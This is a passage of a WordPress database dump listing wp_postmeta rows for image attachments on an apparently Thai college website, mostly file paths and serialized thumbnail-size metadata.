(5495, 1793, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:192;s:6:\"height\";i:237;s:4:\"file\";s:30:\"2018/03/13-3-2561-12-02-47.jpg\";s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"13-3-2561-12-02-47-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5496, 1794, '_wp_attached_file', '2018/03/13-3-2561-11-19-24.jpg'),
(5497, 1794, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:585;s:6:\"height\";i:165;s:4:\"file\";s:30:\"2018/03/13-3-2561-11-19-24.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"13-3-2561-11-19-24-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"13-3-2561-11-19-24-300x85.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:85;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:30:\"13-3-2561-11-19-24-400x113.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:113;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5498, 1795, '_wp_attached_file', '2018/03/13-3-2561-11-27-05.jpg'),
(5499, 1795, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:494;s:6:\"height\";i:315;s:4:\"file\";s:30:\"2018/03/13-3-2561-11-27-05.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"13-3-2561-11-27-05-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:30:\"13-3-2561-11-27-05-300x191.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:191;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:30:\"13-3-2561-11-27-05-400x255.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:255;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5500, 1792, '_publicize_pending', '1'),
(5501, 1792, '_hide_featured', NULL),
(5502, 1797, '_edit_lock', '1531195814:3'),
(5503, 1797, '_edit_last', '3'),
(5504, 1798, '_wp_attached_file', '2018/03/13-3-2561-11-28-10-1.jpg'),
(5505, 1798, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:581;s:6:\"height\";i:164;s:4:\"file\";s:32:\"2018/03/13-3-2561-11-28-10-1.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:32:\"13-3-2561-11-28-10-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:31:\"13-3-2561-11-28-10-1-300x85.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:85;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:32:\"13-3-2561-11-28-10-1-400x113.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:113;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5506, 1799, '_wp_attached_file', '2018/03/13-3-2561-11-32-42-1.jpg'),
(5507, 1799, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:478;s:6:\"height\";i:323;s:4:\"file\";s:32:\"2018/03/13-3-2561-11-32-42-1.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:32:\"13-3-2561-11-32-42-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:32:\"13-3-2561-11-32-42-1-300x203.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:203;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:32:\"13-3-2561-11-32-42-1-400x270.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:270;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5508, 1800, '_wp_attached_file', '2018/03/13-3-2561-12-03-05-1.jpg'),
(5509, 1800, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:192;s:6:\"height\";i:237;s:4:\"file\";s:32:\"2018/03/13-3-2561-12-03-05-1.jpg\";s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:32:\"13-3-2561-12-03-05-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5510, 1797, '_publicize_pending', '1'),
(5511, 1797, '_hide_featured', NULL),
(5512, 1803, '_wp_attached_file', '2018/01/นายยุทธนา-อ่อนส้มกฤษ.jpg'),
(5513, 1803, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:359;s:6:\"height\";i:531;s:4:\"file\";s:70:\"2018/01/นายยุทธนา-อ่อนส้มกฤษ.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:70:\"นายยุทธนา-อ่อนส้มกฤษ-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:70:\"นายยุทธนา-อ่อนส้มกฤษ-203x300.jpg\";s:5:\"width\";i:203;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:70:\"นายยุทธนา-อ่อนส้มกฤษ-203x300.jpg\";s:5:\"width\";i:203;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5524, 1811, '_edit_lock', '1520965986:1'),
(5525, 1811, '_edit_last', '1'),
(5526, 1812, '_wp_attached_file', '2018/03/ประกาศรายชื่อผู้ผ่านการคัดเลือก-ปวส-2561-2-01.png'),
(5527, 1812, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1240;s:6:\"height\";i:1754;s:4:\"file\";s:125:\"2018/03/ประกาศรายชื่อผู้ผ่านการคัดเลือก-ปวส-2561-2-01.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:125:\"ประกาศรายชื่อผู้ผ่านการคัดเลือก-ปวส-2561-2-01-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:125:\"ประกาศรายชื่อผู้ผ่านการคัดเลือก-ปวส-2561-2-01-212x300.png\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:126:\"ประกาศรายชื่อผู้ผ่านการคัดเลือก-ปวส-2561-2-01-768x1086.png\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:126:\"ประกาศรายชื่อผู้ผ่านการคัดเลือก-ปวส-2561-2-01-724x1024.png\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:125:\"ประกาศรายชื่อผู้ผ่านการคัดเลือก-ปวส-2561-2-01-212x300.png\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5528, 1813, '_wp_attached_file', '2018/03/ประกาศรายชื่อผู้ผ่านการคัดเลือก-ปวส-2561-1-01.png'),
(5529, 1813, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1240;s:6:\"height\";i:1754;s:4:\"file\";s:125:\"2018/03/ประกาศรายชื่อผู้ผ่านการคัดเลือก-ปวส-2561-1-01.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:125:\"ประกาศรายชื่อผู้ผ่านการคัดเลือก-ปวส-2561-1-01-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:125:\"ประกาศรายชื่อผู้ผ่านการคัดเลือก-ปวส-2561-1-01-212x300.png\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:126:\"ประกาศรายชื่อผู้ผ่านการคัดเลือก-ปวส-2561-1-01-768x1086.png\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:126:\"ประกาศรายชื่อผู้ผ่านการคัดเลือก-ปวส-2561-1-01-724x1024.png\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:125:\"ประกาศรายชื่อผู้ผ่านการคัดเลือก-ปวส-2561-1-01-212x300.png\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5533, 1811, '_hide_featured', NULL),
(5534, 1811, '_wpas_done_all', '1'),
(5535, 1811, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575633251;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:5936;}i:1;a:1:{s:2:\"id\";i:6040;}i:2;a:1:{s:2:\"id\";i:4093;}}}}'),
(5536, 1819, '_wp_attached_file', '2018/03/14-3-2561-9-15-49.jpg');
INSERT INTO `wp_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
(5537, 1819, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:193;s:6:\"height\";i:240;s:4:\"file\";s:29:\"2018/03/14-3-2561-9-15-49.jpg\";s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"14-3-2561-9-15-49-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5538, 1820, '_wp_attached_file', '2018/03/14-3-2561-9-16-13.jpg'),
(5539, 1820, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:582;s:6:\"height\";i:158;s:4:\"file\";s:29:\"2018/03/14-3-2561-9-16-13.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"14-3-2561-9-16-13-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:28:\"14-3-2561-9-16-13-300x81.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:81;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:29:\"14-3-2561-9-16-13-400x109.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:109;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5540, 1821, '_wp_attached_file', '2018/03/14-3-2561-9-20-16.jpg'),
(5541, 1821, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:198;s:6:\"height\";i:240;s:4:\"file\";s:29:\"2018/03/14-3-2561-9-20-16.jpg\";s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"14-3-2561-9-20-16-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5542, 1822, '_wp_attached_file', '2018/03/14-3-2561-9-16-38.jpg'),
(5543, 1822, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:586;s:6:\"height\";i:161;s:4:\"file\";s:29:\"2018/03/14-3-2561-9-16-38.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"14-3-2561-9-16-38-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:28:\"14-3-2561-9-16-38-300x82.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:82;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:29:\"14-3-2561-9-16-38-400x110.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:110;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5544, 1823, '_wp_attached_file', '2018/03/14-3-2561-9-27-30.jpg'),
(5545, 1823, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:468;s:6:\"height\";i:315;s:4:\"file\";s:29:\"2018/03/14-3-2561-9-27-30.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"14-3-2561-9-27-30-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"14-3-2561-9-27-30-300x202.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:202;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:29:\"14-3-2561-9-27-30-400x269.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:269;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5546, 1824, '_wp_attached_file', '2018/03/14-3-2561-13-43-40.jpg'),
(5547, 1824, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:197;s:6:\"height\";i:242;s:4:\"file\";s:30:\"2018/03/14-3-2561-13-43-40.jpg\";s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"14-3-2561-13-43-40-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5548, 1825, '_wp_attached_file', '2018/03/14-3-2561-9-28-10.jpg'),
(5549, 1825, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:579;s:6:\"height\";i:158;s:4:\"file\";s:29:\"2018/03/14-3-2561-9-28-10.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"14-3-2561-9-28-10-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:28:\"14-3-2561-9-28-10-300x82.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:82;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:29:\"14-3-2561-9-28-10-400x109.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:109;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5550, 1826, '_wp_attached_file', '2018/03/14-3-2561-9-39-21.jpg'),
(5551, 1826, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:394;s:6:\"height\";i:316;s:4:\"file\";s:29:\"2018/03/14-3-2561-9-39-21.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"14-3-2561-9-39-21-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"14-3-2561-9-39-21-300x241.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:241;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:29:\"14-3-2561-9-39-21-374x300.jpg\";s:5:\"width\";i:374;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5552, 1827, '_wp_attached_file', '2018/03/14-3-2561-9-43-36.jpg'),
(5553, 1827, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:194;s:6:\"height\";i:242;s:4:\"file\";s:29:\"2018/03/14-3-2561-9-43-36.jpg\";s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"14-3-2561-9-43-36-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5554, 1828, '_wp_attached_file', '2018/03/14-3-2561-9-39-44.jpg'),
(5555, 1828, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:582;s:6:\"height\";i:163;s:4:\"file\";s:29:\"2018/03/14-3-2561-9-39-44.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"14-3-2561-9-39-44-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:28:\"14-3-2561-9-39-44-300x84.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:84;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:29:\"14-3-2561-9-39-44-400x112.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:112;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5556, 1829, '_wp_attached_file', '2018/03/14-3-2561-13-23-43.jpg'),
(5557, 1829, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:586;s:6:\"height\";i:624;s:4:\"file\";s:30:\"2018/03/14-3-2561-13-23-43.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"14-3-2561-13-23-43-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:30:\"14-3-2561-13-23-43-282x300.jpg\";s:5:\"width\";i:282;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:30:\"14-3-2561-13-23-43-282x300.jpg\";s:5:\"width\";i:282;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5558, 1830, '_wp_attached_file', '2018/03/14-3-2561-13-27-29.jpg'),
